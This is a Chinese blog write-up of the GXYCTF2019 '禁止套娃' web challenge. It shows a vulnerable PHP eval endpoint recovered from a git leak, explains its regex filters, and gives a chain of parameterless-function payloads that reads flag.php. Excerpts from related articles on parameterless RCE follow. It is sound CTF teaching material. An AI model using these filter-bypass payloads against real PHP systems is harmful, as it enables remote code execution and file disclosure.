[GXYCTF2019]禁止套娃

最新推荐文章于 2024-04-10 16:31:45 发布
最新推荐文章于 2024-04-10 16:31:45 发布
阅读量72 收藏
点赞数
分类专栏: CTF题目(web) 文章标签: 安全
原文链接:https://blog.csdn.net/weixin_45785288/article/details/109259595
版权

打开环境,只看到:flag在哪里呢?
查看源码也没有发现任何有用的内容,直接用工具扫看看,用dirsearch扫完还是没发现。这时想到有没有可能存在源码泄露。
用GitHack试一下,结果真的存在git泄露,并得到一个index.php:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

分析代码,包含了flag.php,输出:flag在哪里呢? 就是现在的页面。接着GET方式传入exp参数。

* 第一个if是个正则匹配(preg_match() 函数是用来匹配的,如果存在就返回真),过滤了 data/filter/php/phar伪协议,不能以伪协议直接读取文件。

* 第二个if是要求我们有一个’;‘,即表达式前面内容被替换完只剩“;”(preg_replace 函数执行一个正则表达式的搜索和替换)(?R)引用当前表达式,后面加了?递归调用,如果用有参数的函数就会在替换后剩下参数,所以只能匹配通过无参数的函数。 就是只允许:a(b(c())); a();这种格式。
 有关递归参考:https://blog.csdn.net/technofiend/article/details/49906755
 
   *第三个if过滤了一些关键字

这样一来,失去了参数,我们进行RCE的难度则会大幅上升。既然getshell基本不可能,那么考虑读源码。看源码,flag应该就在flag.php。我们想办法读取,首先需要得到当前目录下的文件。
scandir()函数可以扫描当前目录下的文件 但是scandir函数要有一个参数呀,这里就有一个localeconv函数了。
localeconv() 函数是用来返回一包含本地数字及货币格式信息的数组,数组第一个值是"."。
但返回的结果为数组类型,就用current()函数 返回数组中的当前单元, 默认取第一个值“.”。 每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。 pos()函数current()函数的别名。
array_reverse()函数以相反的元素顺序返回数组。
next() 函数将内部指针指向数组中的下一个元素,并输出。
最后用 **show_source()、 highlight_file()、readfile()**三个中的一个函数将结果打印到屏幕。

先构造:?exp=print_r(scandir(current(localeconv())));
在这里插入图片描述

会发现当前目录下的flag.php排在倒数第二个位置.这里我们有next函数可以输出数组中内置指针加’1’指向的位置.可是我们无法通过3个next函数得到flag.php因为next函数它的返回类型并不是一个数组.所以换个思路,先将数组倒转过来,然后再通过next函数得到flag.php.接着在对应进行打印输出.

构造payload:?exp=print_r(array_reverse(scandir(current(localeconv()))));
把数组反过来了:
在这里插入图片描述

这样就可以把数组反过来了,再加上个next把指针指向下一个,构造:highlight_file(next(array_reverse(scandir(current(localeconv())))));
得到答案。

Kevin_xiao~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php无参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1873
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
[ctf web]从 [GXYCTF2019]禁止套娃 开始的无参数函数RCE
ShenZ的博客
08-15 313
无参数函数RCE [GXYCTF2019]禁止套娃 wp 无参数函数RCE sky大佬yyds!rce一定要看大佬的文章!!link
php无参数函数利用
L1ni01
10-24 1864
php无参数函数利用 1.我们先看一道题目 无参数的意思可以是a()、a(b())或a(b(c())),但不能是a(‘b’)或a(‘b’,‘c’),不能带参数 由 题目中的正则我们可以发现,我们无法写参数进去,只能用 a(b(c())) 这种方式进行rce,这题过滤的是中文 的 () 所以不要多想。(出题人的小技巧,哈哈) 介绍无参数函数绕过所需要利用的函数 方法1:getenv() 查阅php手册,有非常多的超全局变量 $GLOBALS $_SERVER $_GET $_POST $_FILES $_
PHP无参函数
Flynn的博客
04-18 655
eg <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); }
php无参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 518
前言最近做了一些 php 无参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
php无参数函数实现rce,无参数读文件和RCE总结
weixin_28759987的博客
04-02 755
chr(time)chr(current(localtime(time)))chr(time) :chr 函数以256为一个周期,所以 chr(46) , chr(302) , chr(558) 都等于 "."所以使用 chr(time) ,一个周期必定出现一次 "."chr(current(localtime(time))) :数组第一个值每秒+1,所以最多60秒就一定能得到46,用 curre...
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1206
[极客大挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
无参rce总结
最新发布
weixin_66839513的博客
04-10 689
if(';R)?正则表达式 [^\W]+\((?R)?\) 匹配了一个或多个(表示函数名),后跟一个括号(表示函数调用)。其中 (?R) 是递归引用,它只能匹配和替换嵌套的函数调用,而不能处理函数参数。使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。
php调用无参数函数可以传入参数
Mr.horse的博客
07-07 286
假设有一个无参数函数,那么调用这个函数时即使传入参数也不会报错 <?php function printv(){ echo "hello"; } $i=55; printv($i); ?>
php 让函数的参数可有可无(可以不传递参数)
王佳斌
02-26 6215
前言 正常情况下,函数一旦声明参数,调用时就必须传入,否则会报错: function demo($e){ return $e; } echo demo(); // Uncaught ArgumentCountError: Too few arguments to function xxxx() 那么如何实现 想传参就传,不想传就不传呢? 实现 很简单,只需要 将形参指定默认值为空即可,...
php析构函数和构造函数,php构造函数和析构函数
weixin_32047493的博客
03-23 126
构造函数void __construct ([ mixed $args [, $... ]] )PHP 5 允行开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。Note: 如果子类中定义了构造函数则不会隐式调用其父类的构造函数。要执行父类的构造函数,需要在子类的构造函数中调用 parent::__constru...
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
CTF入门之SQL注入
PolarPeak的博客
12-08 2187
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
无参数rce
qq_45570082的博客
06-07 2048
总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头)) 首先准备代码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) { eval($_GET['a']);} 利用session_id php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有
Php没有构造函数怎么办,没有参数或可执行代码的PHP构造函数
weixin_35703300的博客
03-18 166
在了解设计模式的同时,我遇到了单例模式:class Singleton{private static $instance = null;private function __construct(){}public static function getInstance(){if (self::$instance === null) {self::$instance = new self();}re...
PHP无参数RCE
weixin_43610673的博客
03-14 2844
无参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,你可以定义一个结构体来表示一个套娃人偶,其中包含一个指向更小人偶的指针。例如: ```c struct Doll { int size; struct Doll* smaller_doll; }; ``` 然后,你可以创建一组套娃人偶对象,并将它们连接起来形成套娃的层次结构。例如: ```c struct Doll doll1 = { 1, NULL }; struct Doll doll2 = { 2, &doll1 }; struct Doll doll3 = { 3, &doll2 }; // 依此类推... ``` 在这个例子中,doll3 是最外层的人偶,它包含了指向 doll2 的指针,而 doll2 又包含了指向 doll1 的指针。 最后,你可以通过遍历套娃的层次结构来打印出每个人偶的大小。例如: ```c struct Doll* current_doll = &doll3; while (current_doll != NULL) { printf("Doll size: %d\n", current_doll->size); current_doll = current_doll->smaller_doll; } ``` 这样,你就可以按照从外到内的顺序打印出每个人偶的大小。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值